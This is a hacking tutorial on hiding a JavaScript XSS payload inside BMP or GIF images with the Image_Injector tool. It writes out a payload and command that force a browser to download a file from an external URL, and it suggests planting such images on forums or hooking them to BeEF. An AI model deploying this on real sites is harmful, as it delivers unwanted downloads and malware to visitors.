Welcome back today we will talk about Injecting some malicious XSS code into a Image.
We will be using Kali Linux for this tutorial however you can use an operating system of your choice. We recommend using Linux. If you don’t already have Linux you can download Kali Linux from here.
Cross Site Scripting is one of the most common and powerful vulnerabilities on the Web. The cross-site scripting attack is an attack on web applications and browser software which can allow a hacker to inject malicious scripts to perform malicious actions. The malicious script is executed on the browser side, which makes this attack very powerful, stealthy and critical.
Lets say we wanted to inject a Java Script payload directly into an image how could we achieve this ?.
So we know that the system operator/webmaster of a platform permits execution of Java Scripts from the same domain. WYSIWYG editor permits writing HTML code and downloading images. A hacker could then create a script malicious Java Script and inject it into an image, or create an image with an injected payload.
In this tutorial we will be using a Python tool called Image_Injector if you don’t already have Image_Injector download it from the link below.
In this tutorial I will be injecting some XSS code directly into a BMP Image you can also use a Gif image if you wish.
Download a Gif or BMP Image of your choice in this tutorial we will use a BMP image.
I will be using a XSS Payload to force a user to download a file from an external location.
Example of Java Script Payload.
var link = document.createElement('a'); link.href = 'https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.68-installer.msi';' link.download = ''; document.body.appendChild(link); link.click();
This peace of Java script creates an HTML anchor (<a> tag) which point to the file to download (an image in the example script). Then the click() function of the “link” object.
Now we need to inject our Java Script XSS payload into the BMP or Gif Image open up a new terminal and navigate to the download location of Image_Injector Script.
Image Injector includes two scripts Bmp Inejctor and Gif Injector the options are the same for both scripts.
To start we will use one of the following commands to execute the script and inject our Java Script. If you need help you can use the -h option to list available options.
Usage: gif_injector.py [-h] [-i] filename js_payload
Usage: bmp_injector.py [-h] [-i] filename js_payload
Example my Command looks like this.
python bmp_injector.py -i bmp-128.bmp "var link = document.createElement('a'); link.href = 'https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.68-installer.msi'; link.download = ''; document.body.appendChild(link); link.click();"
We have injected our Java Script payload into the image. We can find the output file in the script directory. There will also see a HTML script template of your gif or bmp generated inside the script directory.
If we take a look inside the generated HTML script you will be able to see a template generated for use with the injected image.
Now Let’s copy the content of the script directory, and put it into the /var/www/ directory.
Run apache2 services using the following command.
service apache2 start
This will start a Apache web server.
Now open up a new browser and run the HTML page. Navigate to your local IP address 127.0.0.1.
You should now be able to see a Java script alert notification within your browser prompting you to download a file.
Now lets imagine that we could exploit XSS with an image ?. Can we insert it as a comment ? on an Forum, Blog or Web Application or even integrate the malicious Gif/Bmp image with a BEeF hook or from a similar framework..The results could be devastating.
In this tutorial we used a non-malicious download file called Putty to use as an example. If a hacker was to include a download location to a malicious Malware or Virus an attacker could then carry out further attacks.
- Top 10 Phishing Tools - 10th April 2020
- Distributed Hash Cracking Hashcat Hashtopolis Tutorial - 30th March 2020
- Cracking Password Hashes with Hashcat Rule-based attack - 27th March 2020